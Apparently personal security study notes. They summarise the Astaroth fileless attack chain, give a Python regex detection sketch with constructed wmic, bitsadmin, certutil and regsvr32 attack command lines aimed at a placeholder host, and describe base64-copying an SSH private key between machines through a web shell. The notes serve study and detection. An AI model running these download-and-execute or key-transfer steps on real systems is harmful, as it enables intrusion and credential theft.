fileless threat - abuses built-in system tools to attack. Malicious file is never written to disk; it runs in memory.
spear-phishing email > link to LNK file > executes wmic tool with /Format > allows download & execution of JS code > downloads payload abusing bitsadmin tool
// payload is base64 encoded and decoded with certutil, resulting in DLL files > regsvr32 tool loads one decoded DLL > that chain loads the others till the final payload (Astaroth) > injected into the userinit process.
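Added detection sketch (mine, not from the original notes or any vendor) that flags the living-off-the-land stages of this chain in process command lines. The sample command lines are constructed, example.invalid is a placeholder host, and the regexes are assumptions to tune against real telemetry.

```python
import re

# Constructed sample process-creation command lines (not real telemetry),
# modelled on the wmic -> bitsadmin -> certutil -> regsvr32 chain above.
SAMPLE_EVENTS = [
    r'wmic.exe os get /format:"https://example.invalid/x.xsl"',
    r"bitsadmin.exe /transfer job /download /priority normal https://example.invalid/a.txt C:\Users\Public\a.txt",
    r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.dll",
    r"regsvr32.exe /s C:\Users\Public\a.dll",
    r"notepad.exe C:\Users\alice\notes.txt",          # benign
    r"certutil.exe -hashfile C:\Windows\System32\kernel32.dll MD5",  # benign certutil use
]

# One rule per chain stage: (name, regex over the command line). Assumed patterns.
RULES = [
    ("wmic_remote_xsl", re.compile(r'\bwmic(\.exe)?\b.*?/format:\s*"?https?://', re.I)),
    ("bitsadmin_download", re.compile(r"\bbitsadmin(\.exe)?\b.*?/(transfer|addfile).*https?://", re.I)),
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*?-decode\b", re.I)),
    ("regsvr32_user_writable_path", re.compile(r"\bregsvr32(\.exe)?\b.*?(Users\\Public|AppData|Temp)\\", re.I)),
]


def match_rules(cmd):
    """Return the names of all rules whose pattern matches one command line."""
    return [name for name, pat in RULES if pat.search(cmd)]


def scan(events):
    """Return (event index, matched rule names) for every event that hits a rule."""
    hits = []
    for i, cmd in enumerate(events):
        names = match_rules(cmd)
        if names:
            hits.append((i, names))
    return hits


def chain_score(events):
    """Number of distinct chain stages seen in the event set; several stages
    together on one host are far stronger evidence than any single LOLBin hit."""
    seen = set()
    for _, names in scan(events):
        seen.update(names)
    return len(seen)


if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS):
        print(i, names, SAMPLE_EVENTS[i])
    print("stages seen:", chain_score(SAMPLE_EVENTS))
```

Single hits (a lone certutil -decode) are noisy on their own; the score across stages is what is worth alerting on.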
//multiple methods
small file size: encode file to base64 string > copy it from terminal > decode. Check md5sum for integrity.
check hash: md5sum id_rsa
encode: cat id_rsa | base64 -w 0 ; echo
copy and paste contents to pwsh
decode:
$base64String = "<paste base64 here>"   # placeholder: replace with the copied string
$decodedBytes = [Convert]::FromBase64String($base64String)
$decodedText = [System.Text.Encoding]::ASCII.GetString($decodedBytes)
$decodedText
[IO.File]::WriteAllBytes("C:\path\to\file", $decodedBytes)   # write raw bytes so the hash can be compared (path is a placeholder)
check md5 hash: Get-FileHash \path\to\file -Algorithm MD5 (compare with the md5sum output from the source side)
cons: cmd.exe has a max command-line length of 8191 characters; a web shell will error on larger strings.
given: outbound HTTP/S through the firewall is allowed.